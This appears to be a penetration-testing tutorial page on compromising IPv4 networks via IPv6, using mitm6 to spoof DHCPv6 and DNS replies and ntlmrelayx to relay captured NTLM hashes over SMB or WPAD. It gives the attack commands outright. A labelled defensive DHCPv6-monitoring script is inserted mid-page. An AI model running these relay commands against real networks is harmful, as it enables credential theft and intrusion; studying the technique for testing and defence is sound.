Basic attack

This page describes how you can compromise IPv4 networks via IPv6.

The principle is pretty much the same as the one we saw earlier, with increased effectiveness.

First we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network.

mitm6 -d test.local
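Seen from the monitoring side, the DHCPv6 replies described above are the observable part of this step. The following is an added example, not part of the original page: it parses a DHCPv6 payload (RFC 8415 header and options, RFC 3646 DNS option) and flags server messages from hosts or with DNS servers outside an allowlist. The allowlisted addresses and the sample packets are constructed assumptions.

```python
import ipaddress
import struct

ADVERTISE, REPLY = 2, 7      # DHCPv6 message types sent by servers (RFC 8415)
OPT_DNS_SERVERS = 23         # recursive DNS server list option (RFC 3646)

# Assumption: the DHCPv6 servers and resolvers this network is meant to use.
APPROVED_SERVERS = {ipaddress.IPv6Address("fe80::1")}
APPROVED_RESOLVERS = {ipaddress.IPv6Address("2001:db8::53")}

def parse_options(payload):
    """Yield (code, data) for each TLV option after the 4-byte header."""
    off = 4  # 1 byte message type + 3 bytes transaction id
    while off + 4 <= len(payload):
        code, length = struct.unpack_from("!HH", payload, off)
        off += 4
        if off + length > len(payload):
            raise ValueError("truncated DHCPv6 option")
        yield code, payload[off:off + length]
        off += length

def check_dhcpv6(src, payload):
    """Return findings for one DHCPv6 payload sent towards a client."""
    if len(payload) < 4 or payload[0] not in (ADVERTISE, REPLY):
        return []  # client messages (Solicit, Request, ...) are not checked
    src_ip = ipaddress.IPv6Address(src)
    findings = []
    if src_ip not in APPROVED_SERVERS:
        findings.append(f"unapproved DHCPv6 server {src_ip}")
    for code, data in parse_options(payload):
        if code != OPT_DNS_SERVERS:
            continue
        for i in range(0, len(data) - 15, 16):  # list of 16-byte addresses
            dns = ipaddress.IPv6Address(data[i:i + 16])
            if dns not in APPROVED_RESOLVERS:
                findings.append(f"unapproved DNS server {dns} pushed by {src_ip}")
    return findings

def build_message(msg_type, dns):
    """Constructed sample payload: header plus one DNS servers option."""
    data = ipaddress.IPv6Address(dns).packed
    header = bytes([msg_type]) + b"\xaa\xbb\xcc"
    return header + struct.pack("!HH", OPT_DNS_SERVERS, len(data)) + data

if __name__ == "__main__":
    print(check_dhcpv6("fe80::1", build_message(REPLY, "2001:db8::53")))
    print(check_dhcpv6("fe80::bad:1", build_message(REPLY, "fe80::bad:1")))
```
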

For the second part of our attack, we use ntlmrelayx to relay the captured hashes. I will show two possible ways to use this tool. The first is a simple SMB relay like the one we saw earlier:

ntlmrelayx.py -6 -tf Targets.txt -socks -smb2support

In this case, the attack is pretty much the same as the one we saw earlier; we just replaced Responder with mitm6 for the obvious reasons previously mentioned.

Another attack is possible through WPAD serving. WPAD is a protocol used to ensure all systems in an organization use the same web proxy configuration. Instead of individually modifying configurations on each device connected to a network, WPAD locates a proxy configuration file and applies the configuration automatically. More details about this attack can be found in the references. ntlmrelayx can also implement this attack; we launch it using the following command:

ntlmrelayx.py -6 -wh attacker.test.local -tf targets.txt -l loot -socks -debug

References:
